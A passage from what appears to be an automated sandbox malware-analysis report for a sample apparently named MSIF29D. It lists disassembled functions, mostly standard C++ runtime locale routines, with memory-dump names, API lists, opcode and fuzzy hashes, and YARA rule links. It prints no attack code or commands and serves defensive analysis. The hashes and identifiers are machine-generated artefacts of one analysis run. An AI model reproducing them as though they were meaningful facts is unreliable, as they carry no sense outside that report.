                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1096550386-0
                                                                                                                                                                                                                                                                      • Opcode ID: 26c58f344178fc6a6cf9566351ce7163afb1614decf8ae463a15afa47d1c03f0
                                                                                                                                                                                                                                                                      • Instruction ID: c4bafa5ff1110fa48fa63aa840039f73b7fb03e6eb177f474ce659072bd6f9f7
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26c58f344178fc6a6cf9566351ce7163afb1614decf8ae463a15afa47d1c03f0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A851B472A0028AAFEF219F66DC41EBF36A9EF647A0B150129FD04D6251F735DC10A7A1
                                                                                                                                                                                                                                                                      Function 00FBB8B0 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBB8DD
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBB900
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB928
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FBB98D
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB9B7
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                                                                                                                                                      • Opcode ID: 17000edd4100f59cc6f47c01f7094a833c9c8bbdf43ed374495bf30c7ee21f84
                                                                                                                                                                                                                                                                      • Instruction ID: 549fd45cb95cb1b1e5a23416c16227d43728a846cfeb889d7b6035b8fde7a1e3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17000edd4100f59cc6f47c01f7094a833c9c8bbdf43ed374495bf30c7ee21f84
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD312231C00209DFCB22CF54D941BAEBBB4EF14724F24419DE99467391DBB5AE01DB91
                                                                                                                                                                                                                                                                      Function 00FB5890 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,?,75474450,00FB5646,?,?,?,?,?), ref: 00FB5898
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                                      • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                                                                                                                                                                                                      • API String ID: 1452528299-1782174991
                                                                                                                                                                                                                                                                      • Opcode ID: 94f3f6f4f6baea6c5ef21d1c42fd0f8963611e981e04cf426462b2cf9d52f8bc
                                                                                                                                                                                                                                                                      • Instruction ID: 66c1e3585f9cc6688232ab1e1462b7de8d8987ee2f7588889a7400a67e2f86f9
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94f3f6f4f6baea6c5ef21d1c42fd0f8963611e981e04cf426462b2cf9d52f8bc
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70118E16E10225C7DB312F6DD8003BAB2E4EF51B64F65047FE8C9D7391EAB98C819B94
                                                                                                                                                                                                                                                                      Function 00FC1C42 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Maklocstr$Maklocchr
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2020259771-0
                                                                                                                                                                                                                                                                      • Opcode ID: ddef6d360a87fc526a2844901eebe7680ffe04dd730551586441bb3fbabc40eb
                                                                                                                                                                                                                                                                      • Instruction ID: be592ed93da705a6dfe11476d3f67157b38d5bf95b7c9d33cb67a5c4d2016d91
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddef6d360a87fc526a2844901eebe7680ffe04dd730551586441bb3fbabc40eb
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB11C1B19407857FE720DBA4CD82F52B7ECBF06350F040519F645CB642C268FC6497A4
                                                                                                                                                                                                                                                                      Function 00FBD87C Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FBD883
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBD88D
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 00FBD8C7
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FBD8DE
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBD8FE
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 743221004-0
                                                                                                                                                                                                                                                                      • Opcode ID: c9472ffae8c13529b338ed25389c5e9833d24f0d36b8f15547137c93412a1744
                                                                                                                                                                                                                                                                      • Instruction ID: 73259b63f57b433bc0f09e203e749ce920b93586314192eee163fefb8167a4ac
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9472ffae8c13529b338ed25389c5e9833d24f0d36b8f15547137c93412a1744
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3111EC36D0021ADBCB06EBA1C801AFE7761BF80321F24040DE5006B291EF789E01EF92
                                                                                                                                                                                                                                                                      Function 00FC22FA Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2301
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC230B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • codecvt.LIBCPMT ref: 00FC2345
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC235C
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC237C
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 712880209-0
                                                                                                                                                                                                                                                                      • Opcode ID: f7178fee2a0fd916402cbba07009f321851f07e9c960d566d008303ff9b71b18
                                                                                                                                                                                                                                                                      • Instruction ID: 656b48953afc6255f4ecf3fc69a21b1b0dc807d1ac49b2f38b4035b782b0b5a2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7178fee2a0fd916402cbba07009f321851f07e9c960d566d008303ff9b71b18
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D01A17290025ADBCB15EBA4DD42BBD7765AF84720F24050DF500AB3C1DF789E01EBA1
                                                                                                                                                                                                                                                                      Function 00FC238F Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2396
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC23A0
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • codecvt.LIBCPMT ref: 00FC23DA
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC23F1
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2411
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 712880209-0
                                                                                                                                                                                                                                                                      • Opcode ID: 481aa5e313765b030a6e84c36cf3985aa17365b70d98623fed18f2643ac29184
                                                                                                                                                                                                                                                                      • Instruction ID: ce1c9e49af174dc95348da77a087fa86be4a268affc8df58d86d422ba5c797a5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 481aa5e313765b030a6e84c36cf3985aa17365b70d98623fed18f2643ac29184
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D001A17190011ADBCB16EBA4DE42BBE7765AF80720F24040DE5006B292DF789E41EB91
                                                                                                                                                                                                                                                                      Function 00FC24B9 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC24C0
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC24CA
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • collate.LIBCPMT ref: 00FC2504
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC251B
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC253B
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1007100420-0
                                                                                                                                                                                                                                                                      • Opcode ID: 56abcc14c60bff5c414d02d5a2bb3d4b0135fe36d8eb29a6a221eedb990ddee4
                                                                                                                                                                                                                                                                      • Instruction ID: 7264f54f71f7e70ae5a74de99bee3b6680626385da035213109bdbbfd2d96814
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56abcc14c60bff5c414d02d5a2bb3d4b0135fe36d8eb29a6a221eedb990ddee4
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1701C076D0021ADBCB16EBA4DD46BBE7765AF84721F28040DF5006B291CF789F01EB91
                                                                                                                                                                                                                                                                      Function 00FC2424 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC242B
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2435
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • collate.LIBCPMT ref: 00FC246F
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2486
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC24A6
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1007100420-0
                                                                                                                                                                                                                                                                      • Opcode ID: 66cdf79d28e9915e7b5745dd7836e52dc5f3c39fbaa2863f64da0cadebf5795e
                                                                                                                                                                                                                                                                      • Instruction ID: 38dc8b7698a3e6bac39d488ac41d1635809c8bb65df2c4360349e31fc6410020
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66cdf79d28e9915e7b5745dd7836e52dc5f3c39fbaa2863f64da0cadebf5795e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D301617590021ADBCB15EBA4D942BBD7B66EF84720F24040DE50067292DF789A01EBA1
                                                                                                                                                                                                                                                                      Function 00FC25E3 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC25EA
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC25F4
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 00FC262E
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2645
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2665
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2750803064-0
                                                                                                                                                                                                                                                                      • Opcode ID: 60651a38bc530ec66f79fde0923443b715efed4260816c68ef86493947dcdb5c
                                                                                                                                                                                                                                                                      • Instruction ID: 90e68f9c215684771ac7a210f76c80c3f7305b56d402c621965ff65c646c030f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60651a38bc530ec66f79fde0923443b715efed4260816c68ef86493947dcdb5c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC01A17590011ADBCB16EBA0D912FAD7B65BF80710F24440DF50067291CF789E01EBA1
                                                                                                                                                                                                                                                                      Function 00FC254E Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2555
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC255F
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • ctype.LIBCPMT ref: 00FC2599
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC25B0
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC25D0
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 83828444-0
                                                                                                                                                                                                                                                                      • Opcode ID: 3e599df7b0ec47a8be672eb2ab870123262a258688da842861dddc8d951760b0
                                                                                                                                                                                                                                                                      • Instruction ID: a6600cdf20c6a11f74a397584444955ccde58729e89a70d600d614ea47795dfd
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e599df7b0ec47a8be672eb2ab870123262a258688da842861dddc8d951760b0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB01E17680011ADBCB06EBA4D902BAE7765BF84320F28080DE500A7281DF788E01EBA1
                                                                                                                                                                                                                                                                      Function 00FBD6BD Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FBD6C4
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBD6CE
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • codecvt.LIBCPMT ref: 00FBD708
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FBD71F
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBD73F
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 712880209-0
                                                                                                                                                                                                                                                                      • Opcode ID: 099dcf08bda1a6869331ed1f3ce16fb83b60b40d3fbee8a59b682afcb2d5deb1
                                                                                                                                                                                                                                                                      • Instruction ID: a5f2f47ad82d1f234db79fe9aae68bed15426e9edaa1325542cd05c19235589a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 099dcf08bda1a6869331ed1f3ce16fb83b60b40d3fbee8a59b682afcb2d5deb1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B01A175D00159DBCB16FBA4CC45AEE7765BF84720F240509E5006B282EF789A02EB92
